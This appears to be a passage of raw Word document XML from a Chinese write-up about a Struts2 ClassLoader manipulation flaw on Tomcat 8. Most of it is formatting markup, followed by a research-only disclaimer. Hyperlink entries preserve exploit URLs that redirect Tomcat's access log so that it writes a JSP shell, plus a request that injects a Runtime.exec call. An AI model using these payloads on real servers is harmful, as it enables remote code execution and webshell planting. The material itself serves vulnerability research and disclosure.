        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>距离实际的攻击还有一定的距离，发表此文仅供技术研究使用，请勿用于实际攻击。另外，也许还有其他的利用方式，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下那么多的可操控的属性，或许有别的也可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>？其他的容器下，是否也有这么多的可操控属性呢？欢迎感兴趣的同学与我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BSRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的同学讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRPr="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00E413A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00DF1DEC" w:rsidRPr="00DF1DEC" w:rsidSect="00B07B2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344" w:rsidRDefault="006F7344" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006F7344" w:rsidRDefault="006F7344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DF1DEC">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>5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DF1DEC">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>5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344" w:rsidRDefault="006F7344" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006F7344" w:rsidRDefault="006F7344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6F734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6F7344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6F734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EC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6F7344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DF1DEC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E9B22040-158D-4FBA-B2B4-C9FF8ECF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F1DE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1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F1DEC"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/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DF1D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1DEC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DF1DE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DF1DE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struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://javaweb.org/wp-content/uploads/2014/04/1.p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127.0.0.1/struts2-blank/example/aaaa.jsp?a=%3c%25Runtime.getRuntime().exec(%22calc%22);%25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avaweb.org/wp-content/uploads/2014/04/2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/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=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27.0.0.1/shell1.jsp" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp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127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.prefix=shell" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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B4917-3152-4F5C-B775-4613DA7C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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-17T15:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-17T15:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>